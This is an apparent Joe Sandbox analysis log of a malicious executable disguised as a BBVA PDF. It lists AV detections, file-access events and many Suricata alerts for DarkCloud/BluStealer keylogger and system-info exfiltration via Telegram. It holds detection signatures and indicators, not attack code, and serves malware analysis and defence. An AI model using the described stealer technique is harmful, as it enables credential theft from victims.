            2025-03-05T08:27:01.859508+010018100081Potentially Bad Traffic192.168.2.1060414149.154.167.220443TCP
            2025-03-05T08:27:04.797579+010018100081Potentially Bad Traffic192.168.2.1060415149.154.167.220443TCP
            2025-03-05T08:27:07.536291+010018100081Potentially Bad Traffic192.168.2.1060416149.154.167.220443TCP
            2025-03-05T08:27:10.243328+010018100081Potentially Bad Traffic192.168.2.1060417149.154.167.220443TCP
            2025-03-05T08:27:12.985078+010018100081Potentially Bad Traffic192.168.2.1060418149.154.167.220443TCP
            2025-03-05T08:27:15.971808+010018100081Potentially Bad Traffic192.168.2.1060419149.154.167.220443TCP
            2025-03-05T08:27:18.828424+010018100081Potentially Bad Traffic192.168.2.1060420149.154.167.220443TCP
            2025-03-05T08:27:21.785477+010018100081Potentially Bad Traffic192.168.2.1060421149.154.167.220443TCP
            2025-03-05T08:27:24.516796+010018100081Potentially Bad Traffic192.168.2.1060422149.154.167.220443TCP
            2025-03-05T08:27:27.263287+010018100081Potentially Bad Traffic192.168.2.1060423149.154.167.220443TCP
            2025-03-05T08:27:30.098971+010018100081Potentially Bad Traffic192.168.2.1060424149.154.167.220443TCP
            2025-03-05T08:27:32.837841+010018100081Potentially Bad Traffic192.168.2.1060425149.154.167.220443TCP
            2025-03-05T08:27:35.622540+010018100081Potentially Bad Traffic192.168.2.1060426149.154.167.220443TCP
            2025-03-05T08:27:38.330104+010018100081Potentially Bad Traffic192.168.2.1060427149.154.167.220443TCP
            2025-03-05T08:27:41.081114+010018100081Potentially Bad Traffic192.168.2.1060428149.154.167.220443TCP
            2025-03-05T08:27:44.517501+010018100081Potentially Bad Traffic192.168.2.1060429149.154.167.220443TCP
            2025-03-05T08:27:47.461674+010018100081Potentially Bad Traffic192.168.2.1060430149.154.167.220443TCP
            2025-03-05T08:27:50.355773+010018100081Potentially Bad Traffic192.168.2.1060431149.154.167.220443TCP
            2025-03-05T08:27:53.057432+010018100081Potentially Bad Traffic192.168.2.1060432149.154.167.220443TCP
            2025-03-05T08:27:55.831401+010018100081Potentially Bad Traffic192.168.2.1060433149.154.167.220443TCP
            2025-03-05T08:27:58.577634+010018100081Potentially Bad Traffic192.168.2.1060434149.154.167.220443TCP
            2025-03-05T08:28:01.365322+010018100081Potentially Bad Traffic192.168.2.1060435149.154.167.220443TCP
            2025-03-05T08:28:04.321002+010018100081Potentially Bad Traffic192.168.2.1060436149.154.167.220443TCP
            2025-03-05T08:28:07.525794+010018100081Potentially Bad Traffic192.168.2.1060437149.154.167.220443TCP
            2025-03-05T08:28:10.263978+010018100081Potentially Bad Traffic192.168.2.1060438149.154.167.220443TCP
            2025-03-05T08:28:12.981548+010018100081Potentially Bad Traffic192.168.2.1060439149.154.167.220443TCP
            2025-03-05T08:28:16.159955+010018100081Potentially Bad Traffic192.168.2.1060440149.154.167.220443TCP
            2025-03-05T08:28:18.911415+010018100081Potentially Bad Traffic192.168.2.1060441149.154.167.220443TCP
            2025-03-05T08:28:21.634079+010018100081Potentially Bad Traffic192.168.2.1060442149.154.167.220443TCP
            2025-03-05T08:28:24.407992+010018100081Potentially Bad Traffic192.168.2.1060443149.154.167.220443TCP
            2025-03-05T08:28:27.169913+010018100081Potentially Bad Traffic192.168.2.1060444149.154.167.220443TCP
            2025-03-05T08:28:29.955423+010018100081Potentially Bad Traffic192.168.2.1060445149.154.167.220443TCP
            2025-03-05T08:28:32.724069+010018100081Potentially Bad Traffic192.168.2.1060446149.154.167.220443TCP
            2025-03-05T08:28:35.393041+010018100081Potentially Bad Traffic192.168.2.1060447149.154.167.220443TCP
            2025-03-05T08:28:38.107877+010018100081Potentially Bad Traffic192.168.2.1060448149.154.167.220443TCP
            2025-03-05T08:28:40.820652+010018100081Potentially Bad Traffic192.168.2.1060449149.154.167.220443TCP
            2025-03-05T08:28:43.522152+010018100081Potentially Bad Traffic192.168.2.1060450149.154.167.220443TCP
            2025-03-05T08:28:46.258802+010018100081Potentially Bad Traffic192.168.2.1060451149.154.167.220443TCP
            2025-03-05T08:28:49.013629+010018100081Potentially Bad Traffic192.168.2.1060452149.154.167.220443TCP
            2025-03-05T08:28:51.714257+010018100081Potentially Bad Traffic192.168.2.1060453149.154.167.220443TCP
            2025-03-05T08:28:54.459951+010018100081Potentially Bad Traffic192.168.2.1060454149.154.167.220443TCP
            2025-03-05T08:28:57.189541+010018100081Potentially Bad Traffic192.168.2.1060455149.154.167.220443TCP
            2025-03-05T08:28:59.961048+010018100081Potentially Bad Traffic192.168.2.1060456149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\AllData.exeReversingLabs: Detection: 52%
            Multi AV Scanner detection for submitted file
            Source: BBVA-P53269 .pdf.exeVirustotal: Detection: 40%Perma Link
            Source: BBVA-P53269 .pdf.exeReversingLabs: Detection: 52%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: BBVA-P53269 .pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49915 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:60380 version: TLS 1.2
            Source: BBVA-P53269 .pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: W.pdb4 source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then push ebp11_2_0044B930

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60383 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60383 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60383 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60393 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60393 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60445 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60455 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60399 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60403 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60409 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60438 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60381 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60420 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60443 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60443 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60443 -> 149.154.167.220:443
